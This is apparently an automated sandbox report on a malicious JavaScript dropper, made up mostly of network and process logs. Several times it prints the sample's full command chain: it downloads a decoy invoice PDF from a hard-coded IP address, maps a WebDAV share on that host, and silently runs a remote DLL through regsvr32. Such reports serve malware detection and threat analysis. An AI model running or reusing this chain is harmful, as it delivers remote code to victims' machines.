    Source: Joe Sandbox ViewASN Name: BITWEB-ASRU BITWEB-ASRU
    Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49730 -> 193.143.1.205:80
    Source: global trafficHTTP traffic detected: GET /invoice.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 193.143.1.205Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: global trafficHTTP traffic detected: GET /invoice.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 193.143.1.205Connection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
    Source: wscript.exe, 00000000.00000003.1706458040.00000204BF0D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.205/invoice.php
    Source: net.exe, 00000006.00000003.1754675080.0000028369B1F000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000006.00000002.1755505171.0000028369AE8000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000006.00000003.1753601412.0000028369B3C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000006.00000002.1755562092.0000028369B1F000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000006.00000002.1755562092.0000028369B3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.205:8888/
    Source: net.exe, 00000006.00000003.1754675080.0000028369B1F000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000006.00000002.1755562092.0000028369B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.205:8888/2e;
    Source: net.exe, 00000006.00000003.1754675080.0000028369B1F000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000006.00000002.1755562092.0000028369B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.205:8888/6e?
    Source: net.exe, 00000006.00000003.1754675080.0000028369B1F000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000006.00000002.1755562092.0000028369B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.205:8888/jes
    Source: net.exe, 00000006.00000002.1755505171.0000028369AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.205:8888/tem
    Source: 77EC63BDA74BD0D0E0426DC8F80085060.7.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    Source: svchost.exe, 00000008.00000003.1754665179.000001E979618000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
    Source: edb.log.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
    Source: edb.log.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
    Source: edb.log.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
    Source: svchost.exe, 00000008.00000003.1754665179.000001E979618000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
    Source: svchost.exe, 00000008.00000003.1754665179.000001E979618000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
    Source: svchost.exe, 00000008.00000003.1754665179.000001E97964D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
    Source: edb.log.8.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
    Source: 2D85F72862B55C4EADD9E66E06947F3D0.7.drString found in binary or memory: http://x1.i.lencr.org/
    Source: svchost.exe, 00000008.00000003.1754665179.000001E9796C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
    Source: edb.log.8.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
    Source: edb.log.8.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
    Source: edb.log.8.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
    Source: svchost.exe, 00000008.00000003.1754665179.000001E9796C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.8.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
    Source: svchost.exe, 00000008.00000003.1754665179.000001E9796C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
    Source: edb.log.8.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:

    Spam, unwanted Advertisements and Ransom Demands

    barindex
    Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 7336, type: MEMORYSTR

    System Summary

    barindex
    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\19908223222030.dll
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\19908223222030.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"Jump to behavior
    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
    Source: 31070304561863532281.jsInitial sample: Strings found which are bigger than 50
    Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winJS@27/57@1/2
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7396:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_olqmztru.j3f.ps1Jump to behavior
    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: 31070304561863532281.jsVirustotal: Detection: 11%
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\31070304561863532281.js"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\19908223222030.dll
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\invoice.pdf"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.205@8888\davwwwroot\
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.205@8888\davwwwroot\
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1704,i,14534165756939046791,6243001767822148807,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\19908223222030.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\invoice.pdf"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.205@8888\davwwwroot\Jump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.205@8888\davwwwroot\Jump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1704,i,14534165756939046791,6243001767822148807,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: drprov.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: ntlanman.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: davclnt.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: davhlpr.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
